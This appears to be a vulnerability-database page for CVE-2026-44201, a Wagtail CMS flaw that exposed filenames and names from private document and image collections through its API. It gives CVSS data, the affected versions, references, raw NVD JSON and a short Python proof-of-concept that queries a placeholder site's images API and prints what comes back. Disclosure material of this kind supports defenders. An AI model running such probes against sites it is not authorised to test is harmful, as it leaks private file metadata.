CVE-2026-44201

Description

Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, the Documents and Images API incorrectly listed items in private collections. A user with access to the API could see the filename and name of documents and images in private collections. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:* - VULNERABLE

Wagtail < 7.0.7

Wagtail < 7.3.2

Wagtail < 7.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL vulnerable to CVE-2026-44201
# Replace with actual target domain
target_url = "http://target-site.com/api/v2/images/"

try:
    # Send a GET request to the API
    # No authentication is required based on the vulnerability description
    response = requests.get(target_url)

    if response.status_code == 200:
        data = response.json()
        print("Successfully retrieved data:")
        # Check if items from private collections are exposed
        for item in data.get('items', []):
            print(f"Title: {item.get('title')}, Filename: {item.get('filename')}")
    else:
        print(f"Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44201
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44201
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44201/
[4] VulDB https://vuldb.com/cve/CVE-2026-44201
[5] https://github.com/wagtail/wagtail/security/advisories/GHSA-p5gm-92h4-6pv6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44201", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:35.850", "lastModified": "2026-05-12T15:59:06.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wagtail is an open source content management system built on Django. Prior to 7.0.7, 7.3.2, and 7.4, the Documents and Images API incorrectly listed items in private collections. A user with access to the API could see the filename and name of documents and images in private collections. This vulnerability is fixed in 7.0.7, 7.3.2, and 7.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-280"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.7", "matchCriteriaId": "AA54A323-7F77-4D1D-9830-BF8FBE4B5B34"}, {"vulnerable": true, "criteria": "cpe:2.3:a:torchbox:wagtail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.1", "versionEndExcluding": "7.3.2", "matchCriteriaId": "FED1A6D7-1193-485D-B25F-60FCC20A6D6B"}]}]}], "references": [{"url": "https://github.com/wagtail/wagtail/security/advisories/GHSA-p5gm-92h4-6pv6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}